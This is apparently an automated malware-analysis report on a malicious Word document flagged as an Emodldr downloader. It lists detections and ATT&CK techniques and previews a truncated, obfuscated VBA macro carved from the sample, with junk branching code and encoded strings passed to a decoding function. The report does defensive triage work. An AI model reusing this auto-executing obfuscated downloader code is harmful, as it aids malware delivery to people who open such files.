MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro utilizes `CreateObject` and an `AutoOpen` function, indicating it's designed to execute automatically upon opening. The ClamAV detection and heuristic firings strongly suggest it's a downloader for a second-stage payload, likely from the Emodldr family, though specific attribution is not possible. The macro's obfuscated nature and truncated content prevent a more detailed analysis of its execution flow.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 71468 bytes |
SHA-256: e5db338fba4dbe85781bd5093671083c61ca1712a8d72b574a826f9384aad058 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 24 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "COwjhRKSjDhlD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "BJHkQRC"
Function WwBnwUYaTM()
On Error Resume Next
Select Case mpDMcK
Case 13118
OGJqh = CWRNOf
lDtrnE = JfrRR
aJGYvB = Cos(29946 * CBool(8684))
Case 63352
YqjMR = 61333
BvJkBm = Fix(17906)
oGptj = Oct(28069)
End Select
Wvnwr = bNcjdY("jr2DAxAANAIGAmBwMAIDA1AANAUGA2AQOAIDA4AAMAIDA2AwNAQGA3AQMAIDAyAQYAgDAlBAZAUtbVj,", 6 + 0, 72 + 0)
Select Case YkYsQt
Case 34769
PnECU = Gszdl
WILZXz = HvZLz
hRwnYP = Cos(329 * CBool(67854))
Case 66455
wwjoUh = 25283
PzYVQY = Fix(97510)
SqKRq = Oct(54627)
End Select
Select Case IzCaT
Case 87076
wdwNSV = Cmhwni
YCjss = kjLsPj
BKiIn = Cos(76512 * CBool(37562))
Case 11276
jZwBdZ = 91490
NGDBku = Fix(36053)
aHDMRG = Oct(97007)
End Select
qqTtNWoKir = bNcjdY("dC6z0aAIDAhBQOAUDA2AQMAMGAmBQNAADAxAAOAYGA2AQOAgDAyAQNAUGAxAQZAADAlBAZAgDA5AwMAMDAkBQYAUDA5AQNAYDAzAgMAgDA4AQOAgDA0AgMAMDAmBAMAUGAxAAZAYDAwAgZAMGA3AQOAcDAiBgZAEDA1AQNAMGA0AAZAcLl", 3 + 0, 170 + 0)
Select Case IlrEZJ
Case 99412
MYTKv = HKnXiI
LRPPbM = QsidaN
shrPEH = Cos(76923 * CBool(79994))
Case 22093
IljAsZ = 88348
pCwTco = Fix(96250)
TzTqqj = Oct(66099)
End Select
Select Case BWKRXI
Case 78759
NWSwYj = tqjvia
aclwW = tSIAoD
ijGVh = Cos(57464 * CBool(28074))
Case 80451
SGLGIB = 34736
GRVuw = Fix(64290)
amOGvO = Oct(35819)
End Select
DtkJG = bNcjdY("lbfdNAYDAkBAZAUGAyAwNAYDAwAgNAEDA5AgNAMDAzAQOAMDAwAgMAUDAmBgNAkDAxAAMAYGA1AANAEGAyAwNAYDAzAgYAMDA3AQZAYDA4AgYAUGAwAgYAEGA5AwYAYDAwAAMAUGAzAANAUGAzAgYAQDAiBANAYGAkBQNAgDAiBQMAUGA4AAMAkDA4AQMAYDA1Aw3djFh", 6 + 0, 192 + 0)
Select Case VJEMk
Case 26940
EMQzK = lQSrAC
Wibiza = vPIuOz
pwDohs = Cos(85872 * CBool(25438))
Case 16703
zWBpVw = 27339
MZkniW = Fix(25556)
SSoDW = Oct(65613)
End Select
Select Case jUACmo
Case 52967
qoMiCv = mbBAtz
jTzptw = TfBTj
CfhjFf = Cos(78495 * CBool(70806))
Case 10010
siZEf = 79489
Lfmzl = Fix(63136)
wuiWW = Oct(17121)
End Select
PYaUOwTv = bNcjdY("Xn%AEDAlBANAEDAyAQYAUDAkBwYAgDAzAQNAIGA0AgYAQDAxAwM3wDz", 5 + 0, 48 + 0)
Select Case PTVhH
Case 87625
vOKwi = FHUsqi
qnwaRw = kKBRNw
dPDXY = Cos(91864 * CBool(64273))
Case 31257
cAGkz = 79321
mjsfUb = Fix(44273)
PIQkkN = Oct(85890)
End Select
Select Case fvwpn
Case 8049
sGiFc = FEwzC
KGlAl = LQfhr
BjDmwb = Cos(20495 * CBool(38537))
Case 16246
LsQNHI = 64635
HAWrN = Fix(11521)
vNXbno = Oct(20994)
End Select
sjhBjDTAV = bNcjdY("9SDA5AAZAknL6i", 5 + 0, 8 + 0)
Select Case CDtzT
Case 10787
miwcu = kXKCiV
rFJVz = DOnsUt
dNJOL = Cos(26592 * CBool(9284))
Case 71466
ovkLA = 20818
MYFTlX = Fix(93987)
XAcBIz = Oct(81713)
End Select
Select Case mfWRK
Case 72244
EwAutq = GrlZji
zAplj = jBtfE
OljmNA = Cos(37871 * CBool(23346))
Case 1226
iTRXtp = 87373
jVSwmi = Fix(64345)
iZBDCV = Oct(80723)
End Select
TAtKBMDO = bNcjdY("EVCKwYAUGAmBANAgDA5AAZAYDA2AAO
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.